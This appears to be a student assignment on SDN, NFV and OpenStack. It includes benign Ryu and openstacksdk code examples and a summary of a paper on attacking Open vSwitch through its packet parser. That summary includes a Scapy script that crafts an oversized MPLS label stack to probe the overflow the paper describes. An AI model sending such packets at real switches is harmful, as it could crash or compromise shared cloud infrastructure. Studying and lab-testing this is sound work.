1. Software Defined Network (SDN)

a: Explain the role of SDN controllers in a software defined network (SDN).
The SDN controller is the central component of a software defined network. It acts as the network's brain and governs the network configuration and routing policy in a centralized way, which makes it possible to manage the network efficiently from a single location. For instance, the forwarding tables in the switches route packets according to the commands issued by the SDN controller.

b: What is OpenFlow in SDN?
OpenFlow is a communication protocol that allows network controllers to determine the path of forwarded packets in the network. The Open Networking Foundation (ONF) defines it as the standard interface technology for SDN. With OpenFlow, switches from different vendors can be managed in a uniform way (a minimal controller sketch follows after question d).

c: Explain what "SDN decoupling hardware from software" means.
It means that the control logic becomes software, namely the SDN controller. With SDN there is no need for specialized hardware, because the logic behind the forwarding tables on the switches can be changed and managed via the SDN controller. Traditionally, dedicated hardware was required for special operations such as packet filtering; with SDN, every switch can perform these operations with the appropriate code running on the SDN controller.

d: Why is SDN taking a long time to be adopted?
Different control applications are developed by different parties in different languages and run on different controllers such as Ryu, ONOS or Floodlight, which fragments the ecosystem. I can also imagine that most deployed networks are still traditional, which makes migrating to SDN harder.
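To make the controller's role in a and b more concrete, here is a minimal sketch of an OpenFlow 1.3 control application for the Ryu controller (one of the controllers mentioned in d). It installs a table-miss rule so that unmatched packets are sent to the controller and then floods them back out, illustrating how the controller programs the switches' forwarding tables over the southbound interface. The flooding behavior and the priority value are my own illustrative choices, not part of the course material.

# minimal_ryu_app.py - illustrative Ryu control application (OpenFlow 1.3)
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, set_ev_cls
from ryu.ofproto import ofproto_v1_3


class SimpleController(app_manager.RyuApp):
    OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]

    @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
    def switch_features_handler(self, ev):
        # Called when a switch connects: install a table-miss rule so that
        # packets without a matching flow entry are sent to the controller.
        datapath = ev.msg.datapath
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        match = parser.OFPMatch()  # match everything
        actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
                                          ofproto.OFPCML_NO_BUFFER)]
        self.add_flow(datapath, priority=0, match=match, actions=actions)

    def add_flow(self, datapath, priority, match, actions):
        # The controller writes an entry into the switch's forwarding table
        # via an OpenFlow FlowMod message (southbound interface).
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
                                             actions)]
        mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
                                match=match, instructions=inst)
        datapath.send_msg(mod)

    @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
    def packet_in_handler(self, ev):
        # Packets hitting the table-miss rule arrive here; for illustration
        # we simply flood them out of all ports.
        msg = ev.msg
        datapath = msg.datapath
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        actions = [parser.OFPActionOutput(ofproto.OFPP_FLOOD)]
        data = None
        if msg.buffer_id == ofproto.OFP_NO_BUFFER:
            data = msg.data
        out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
                                  in_port=msg.match['in_port'],
                                  actions=actions, data=data)
        datapath.send_msg(out)

Such an application can be started with ryu-manager and tested against, for example, an Open vSwitch instance or a Mininet topology whose switches are pointed at the controller.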
2. Network Functions Virtualization (NFV)

a: Describe the requirements for the transition from legacy networks to NFV.
To transition from legacy networks to NFV, we need to establish the NFV architecture consisting of the network service layer, the VNF instance layer and the NFV infrastructure layer. We have to obtain components (compute, storage and networking nodes) that support the software needed to run VNFs, such as a hypervisor like KVM or a container management platform. We also need to implement Management and Orchestration (MANO), which provides the framework for managing the NFV infrastructure and provisioning new VNFs. Coexistence with legacy networks and interoperability among multi-vendor implementations play an important role. Another requirement is to support transition paths from today's physical network function (PNF) solutions to more open, standards-based virtual network functions. Lastly, we need to interwork with legacy management functions while having only minimal impact on existing nodes and interfaces.

b: Explain what a VNF is.
A VNF is software that implements specific network services/functions and can be deployed and operated within an NFV infrastructure to perform tasks such as firewalling, DPI (Deep Packet Inspection), transcoding or virtual packet switching. A VNF consists of a single component or multiple components called VNFCs (VNF Components). These VNFCs are internally linked to each other in the form of a graph to represent their interrelationships.

c: Describe the role of the MANO (Management and Orchestration) layer in the NFV architecture proposed by the European Telecommunications Standards Institute (ETSI).
MANO stands for Management and Orchestration and provides a framework for managing the NFV infrastructure and provisioning new VNFs. It consists of an Orchestrator, a VNF Manager (VNFM) and a Virtualized Infrastructure Manager (VIM). The Orchestrator manages the lifecycle of network services; it is responsible for instantiation, policy management and performance measurement as well as KPI monitoring. The VNFM takes care of the lifecycle (initialization, updating, querying, scaling and terminating) of VNF instances. The VIM controls and manages the compute, storage and network resources and also acts as a monitoring tool for the virtualization layer.

d: Investigate Open Source MANO (OSM) from https://osm.etsi.org/ and summarize its recent release features.
OSM is an open-source implementation of the MANO reference architecture provided by ETSI. The newest release is OSM 14 as of July 2023. The main improvements are:
1. Closed-loop life cycle architecture
2. Security enhancements
3. Usability and platform management
4. Infra modelling and NF lifecycle
5. RO performance optimization
6. Simultaneous IPv4 and IPv6 support
7. TAPI VIM connector
8. Support of volume multi-attach
9. Helm chart deployment including update/upgrade
10. Support of different output formats and replacement of Pycurl with Requests

3. OpenStack-Based Cloud Systems

a: Briefly explain what OpenStack is.
OpenStack is a cloud operating system. It is used to control a large pool of compute, storage and networking resources in a datacenter. It provides administrators with a dashboard to control those resources and cloud users with a web interface for resource provisioning. It consists of multiple components called projects, which can be added on demand.

b: Describe "Neutron" as the OpenStack project that provides network resources to users.
Neutron adds "network connectivity as a service" to OpenStack for other OpenStack services, such as OpenStack Compute. It implements and provides the OpenStack Networking API, which lets users define networks and the attachments to them (a minimal usage sketch follows after question d). It has a pluggable architecture that supports many popular networking vendors and technologies.

c: Mention what is being done in OpenStack projects for Service Function Chaining (SFC).
SFC can be implemented using the Service Function Chaining API, which adds SFC support to Neutron. It comes as an extension and can be installed via the python-networking-sfc RPM package provided by the RDO project. The core features are:
1. Creation of service functions
2. Reference implementation with Open vSwitch
3. Flow classification mechanism (ability to select and act on traffic)
4. Vendor-neutral API
5. Modular plugin driver architecture

d: Explain the benefits of building an OpenStack-based cloud.
The main benefits are:
1. Flexibility and customization: you can choose between different hypervisors, storage backends and networking configurations
2. Scalability to handle increasing workloads
3. Multi-tenancy to create isolated environments for different tenants and demands
4. A user-friendly web-based dashboard (Horizon) that reduces overhead for IT teams
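As a concrete illustration of the Networking API described in question b above, here is a minimal sketch that uses the openstacksdk Python library to create a tenant network and subnet through Neutron. The cloud name "mycloud", the network/subnet names and the CIDR are my own illustrative assumptions, not values from the assignment.

# create_network.py - illustrative use of the OpenStack Networking API (Neutron)
# Assumes credentials are available via a clouds.yaml entry named "mycloud".
import openstack

# Establish an authenticated connection to the cloud.
conn = openstack.connect(cloud="mycloud")

# Create an isolated tenant network (Neutron provides "network connectivity
# as a service" for other OpenStack services such as Compute).
network = conn.network.create_network(name="demo-net")

# Attach a subnet so that instances plugged into this network get addresses.
subnet = conn.network.create_subnet(
    network_id=network.id,
    name="demo-subnet",
    ip_version=4,
    cidr="192.168.42.0/24",
)

print(f"Created network {network.id} with subnet {subnet.cidr}")

How the network is actually realized on the hosts (e.g. via Open vSwitch) is decided by the plugin/driver configured behind this API, which is the pluggable architecture mentioned in question b.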
4. Article summary

The paper "Taking Control of SDN-based Cloud Systems via the Data Plane" shows the security implications of virtual switches. The authors conducted a security analysis of virtual switches, introduced a new attacker model for the operation of virtualized data-plane components in SDN and NFV, carried out a proof-of-concept case-study attack on Open vSwitch (OvS) in OpenStack and discussed possible software mitigations and design countermeasures.

The authors identified four main attack surfaces:
1. Hypervisor co-location: components of the slow path often run with root rights in user space on the host system.
2. Centralized control via direct communication: the SDN controller communicates directly with all data-plane elements over the southbound interface (e.g. OpenFlow), for instance over a trusted management network. Therefore, if the controller gets compromised, data can be shared with all data-plane elements.
3. Unified packet parsing: protocol parsing happens in the data plane, so it is exposed to the vulnerabilities of every newly supported protocol.
4. Attacker-controlled data and untrusted input: virtual switches are usually the first point of contact and receive packets from VMs unfiltered.
In summary, virtual switches increase the attack surface, e.g. in cloud environments, and can also lead to the compromise of other parts of the cloud.

They introduced a new attacker model that describes an attacker acting alone, with no physical access and average computer security knowledge, who already controls a compromised VM in the cloud, e.g. obtained by exploiting a web application. They further assume that the cloud provider follows security best practices. The attacker is successful when they can perform arbitrary computation, create/store data or send/receive this data to all nodes and the Internet.

Using this attacker model, they conducted a structured attack by running the American Fuzzy Lop (AFL) fuzzer against OvS's unified packet parser in the slow path and by using Return Oriented Programming (ROP) to compromise the OpenStack cloud via a worm. The problem lay in parsing the MPLS label stack. The standard behavior when parsing MPLS is to pop the label header and make a forwarding decision, but OvS parses all labels of the packet beyond that. Therefore, a long label stack led to a stack buffer overflow in OvS (a simplified sketch of such a packet is given at the end of this summary). They then used a customized ROPgadget tool to create the appropriate ROP chain.

The authors also discussed software mitigations and tested the resulting performance overhead by measuring latency and throughput. They observed a minimal impact of user-land protection mechanisms (1-5%) on slow-path latency and no impact on fast-path latency. Regarding throughput, they observed that the user-land security features result in an overhead of approximately 4-15%, and only in the slow path.

The authors also discussed possible design countermeasures. One approach could be to virtualize the data plane and decouple the hypervisor from guest VMs by giving them direct access to the hardware (e.g. the NIC). Another approach could be to use a centralized firewall that intercepts and sanitizes all control communication, thus removing the ability of nodes to communicate with each other directly.

Pros:
• They showed how easily these attacks can be executed, and therefore how dangerous it is that a programmer of average skill could perform them.
• They compared different virtual switch, NFV and SDN implementations, giving an overview of the options to consider.
• They conducted a real-life case study, showcasing more than just the theoretical possibilities.
• They measured the overhead of the software countermeasures, showing that everything comes with trade-offs.
• They gave an introduction to the basic concepts, which makes the paper easier to read and follow.

Cons:
• They could have shown and explained in more detail the implementation of the worm that compromises the cloud.
• The comparison table for the different virtual switch, NFV and SDN implementations is hard to read; I would recommend using clearer symbols to show the differences.
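To make the malformed-input aspect of the case study more tangible, the following is a small, purely illustrative Python sketch (using Scapy's contrib MPLS layer) of how a packet with an unusually deep MPLS label stack, the kind of input that triggered the parser bug, could be constructed for testing in a lab environment. The interface name, label values and stack depth are arbitrary assumptions of mine; this is not the authors' exploit code.

# mpls_stack_test.py - illustrative only: craft a packet with a very deep
# MPLS label stack for lab testing of a virtual switch's packet parser.
# Assumes a test interface "veth0" attached to the switch under test.
from scapy.all import Ether, IP, UDP, sendp
from scapy.contrib.mpls import MPLS

STACK_DEPTH = 64  # arbitrary, deliberately deeper than any normal label stack

# Build the label stack: s=0 marks "more labels follow", s=1 marks the bottom.
stack = MPLS(label=16, s=0, ttl=64)
for _ in range(STACK_DEPTH - 2):
    stack = stack / MPLS(label=16, s=0, ttl=64)
stack = stack / MPLS(label=16, s=1, ttl=64)

# 0x8847 is the EtherType for MPLS unicast.
pkt = Ether(type=0x8847) / stack / IP(dst="10.0.0.2") / UDP(dport=5000)

# Send the frame toward the switch under test (requires root privileges).
sendp(pkt, iface="veth0", verbose=False)

A parser that only pops the top label and forwards would handle this harmlessly, whereas a parser that walks the entire stack into a fixed-size buffer, as described in the summary above, is exposed to exactly this kind of input.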